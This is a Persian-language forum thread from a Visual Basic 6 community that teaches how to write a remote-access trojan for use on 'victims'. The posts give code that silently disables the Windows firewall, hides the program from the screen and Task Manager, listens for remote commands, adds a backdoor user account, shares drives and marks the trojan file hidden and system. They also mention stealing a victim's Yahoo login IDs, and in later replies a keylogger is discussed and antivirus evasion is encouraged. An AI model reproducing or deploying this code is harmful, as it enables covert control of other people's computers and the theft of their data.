Parsi Coders
تایپیک جامع تروجان نویسی + - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Software Development Programming (http://parsicoders.com/forumdisplay.php?fid=37)
+--- انجمن: Visual Basic Programming (http://parsicoders.com/forumdisplay.php?fid=39)
+---- انجمن: Visual Basic 6 (http://parsicoders.com/forumdisplay.php?fid=44)
+---- موضوع: تایپیک جامع تروجان نویسی + (/showthread.php?tid=2631)

صفحات 1 2

تایپیک جامع تروجان نویسی + - alakimalaki - 07-30-2012

با تشکر از Amin_mansouri که به من اجازه داد تایپیک تروجان نویسی رو راه بندازمtajob

تروجان از دو فایل سرور و کلاینت ساخته شده که برنامه ی کلاینت برای شماس و برنامه سرور برای قربانیه

که از طریق این دو فایل باهم ارتباط برقرار میکنید مثلا ( چت کردن , کنترل سیستم قربانی , .............. )

خب حالا شروع میکنیم به نوشتن سورس تروجان اول از قسمت سرور شروع میکنیم.


وقتی قربانی برنامه ی سرور رو اجرا کنه برنامه یک پورت رو که به دلخواه شماس رو کامپیوتر هدف باز میکنه تا برنامه ی کلاینت شما به ایپی و پورت کانکت بشه منتها فایروال سیستم به باز شدن پورت گیر میده و ما با این کد فایروال سیستم رو خاموش میکنیم

Private Sub Form_Load()
Shell "netsh firewall set opmode disable", vbHide
End Sub
برای پنهان بودن برنامه از کدای زیر استفاده میکنیم


Private Sub Form_Load()
از کار انداختن فایروال ویندوز Shell "netsh firewall set opmode disable", vbHide
پنهان بودن برنامه Form1.Hide
پنهان بودن برنامه در تسک منیجر App.TaskVisible = False
end sub

حالا باید درون فرم یه کنترل winsock بزاریم و در قسمت فرم لود کد های زیر را بگزاریم

Me.Winsock1.LocalPort = 1010
Me.Winsock1.Listen

خط اول یک پورت را به وینسوک میشناسونیم مثلا 1010 و خط دووم یعنی پورت مورد نظررو باز کن و به آن گوش بده , حواستون باشه این کدا رو در فرم لود بزارید
حالا در درون فرم 2 تا Textbox و یک command درست کنید و caption دکمتونو send بزارید

در داخل دکمه ی ارسال این کد رو قرار بدید

Private Sub Command1_Click()
Me.Winsock1.SendData Me.Text1.Text
Me.Text1.Text = ""
End Sub
با این کد نوشته های داخل text1 به برنامه ی دووم یعنی کلاینت فرستاده میشه

و کد پایین نوشتهایی که کلاینت میفرسته درون text2 قرار میده


Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim myd As String
Me.Winsock1.GetData myd, vbString
Me.Text2.Text = myd
End Sub
کد پایین از خطا جلو گیری میکنه

If Me.Winsock1.State <> sckConnected Then Me.Winsock1.Close
Me.Winsock1.Accept requestID
End Sub


Private Sub Winsock1_Close()
Me.Winsock1.Close
Me.Winsock1.Listen
End Sub


حالا میرسیم به اینجا که وقتی قربانی سرور رو باز میکنه هیچی بالا نمیاد پس چجوری پیامی که ما براش میفرستیمو ببینه یا برامون پیام بفرسته

ما در برنامه ی کلاینتمون که در آینده یاد میدم 2 تا دکمه داریم یکی به اسم Show Chat و دومی Hide Chat

دکمه اول رو که بزنیم فرم chat برای قربانی باز میشه و میتونه با ما چت کنه یا ما با اون و دکمه ی دوم فرم چت رو قایم میکنه برای این کار شما این کد هارو به برنامه ی سرور اضافه کنید



Private Sub Text2_Change()
If Me.Text2.Text = "SHOW FORM" Then
Form1.Show
Me.Text2.Text = ""
End If
If Me.Text2.Text = "HIDE FORM" Then
Form1.Hide
Me.Text2.Text = ""
End If
End Sub

خب حالا دیگه سرور ما حاضره اینم سورسش


خب حالا دیگه رسیدیم به بخش کلاینت. چون کد های اساسی رو یاد دادم دیگه کد های کلاینتو یاد نمیدم سورسشو میزارم تا خودتون ببینید

RE: تایپیک جامع تروجان نویسی + - alakimalaki - 07-30-2012

الان یه تروجان داریم که میتونیم به وسیله ی اون با قربانی چت کنیم ایشالا من این تروجانو پیشرفته تر میکنم جوری که بشه با command prompt قربانی کارکرد
برای وصل شدن به command prompt کدهای زیادی هست که ناقص هستند

مثلا یکیش همون استفاده از تابع shell هست که کاملا ناقصه البته سورس کامل ارتباط با cmd هست منتها اونم خیلی پیچیدس

این سورس رو با اینکه سادس ولی با خلاقیت درست کردم کارشم همون ارتباظ با cmd

RE: تایپیک جامع تروجان نویسی + - alakimalaki - 08-05-2012




دستوراتی که توی عکس میبینید رو میشه با استفاده از دستور شرطی IF در text1.change در برنامه ی server گذاشت
اینم سورسش

RE: تایپیک جامع تروجان نویسی + - alakimalaki - 08-05-2012

بچه ها از کدای زیر برای تروجان استفاده کنید جالبه


Kill patch برای پاک کردن فایل یا فولدر

این کد کامپیوترو خاموش میکنه Shell Shutdown -s
Shell Shutdown -r این کد کامپیوترو ریستارت میکنه
ُShell Shutdown -l این کد کامپیوترو logoff میکنه


Shell net share boof=DriveName این دستور درایو موردنظرو تو کامپیوتر share میکنه.
Shell net user boof 1234 /add این دستور در کامپیوتر یه یوزر به اسم بوف با پسورد 1234 ایجاد میکنه


http://www.parsicoders.com/attachment.php?aid=284 البته با این سورس کد میتونید یوزر مخفی ایجاد کنید


با کد پایین میتونید مکان موس رو عوض کنید

Private Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long

SetCursorPos 0, 0
SetCursorPos 1151, 0


SetAttr "c:\trojan.exe", vbhidden + vbsystem این کد برنامه رو هیدن میکنه بصورت سیستمی







RE: تایپیک جامع تروجان نویسی + - alakimalaki - 08-06-2012

دیگه فقط مونده تبادل اطلاعات بین دو کامپیوتر یا همون FTP یه سورس براتون میزارم

اگه چیزه جدیدیم پیدا کردم پست میدم , اگرم سوال داشتین در خدمتم.

RE: تایپیک جامع تروجان نویسی + - alakimalaki - 08-16-2012

اینم یه سورس خیلی کاربردی با این سورس میتونید آیدی هایی که قربانی به یاهو لاگین شده پیدا کنید سورسش ساده نوشتم خیلی ابتدایی , تازه بدرد ویروس نویساهم میخوره

RE: تایپیک جامع تروجان نویسی + - masoodgsm - 10-30-2013

باتشکر از پست مفیدتون سوالی داشتم اکثر ویروس کش به کیلاگر گیر میده و کلید های تایپ شده راهی روشی سورسی هست که آنتی ویروس گیر نده یا غیر فعال بشه

RE: تایپیک جامع تروجان نویسی + - masoodgsm - 11-04-2013

کسی نبوددددد

RE: تایپیک جامع تروجان نویسی + - Amin_Mansouri - 11-05-2013

سلام
اکثر انتی ویروس ها به کرم های گیر میدن که کپی شده باشه
یعنی یه سورس کیلاگر توی اینترنت باشه شما بیایی واسه خودت کنی
تکنیک برنامه نویسی روش های نوشتن مهمه که باید با نحوه اسکن کردن انتی ها اشنا بشی
و بتونی روش های ابداع کنی که انتی دور بزنی
 

RE: تایپیک جامع تروجان نویسی + - masoodgsm - 11-10-2013

منظور بنده هم همین بود از چه روشی استفاده کنیم برای کد نویسی ؟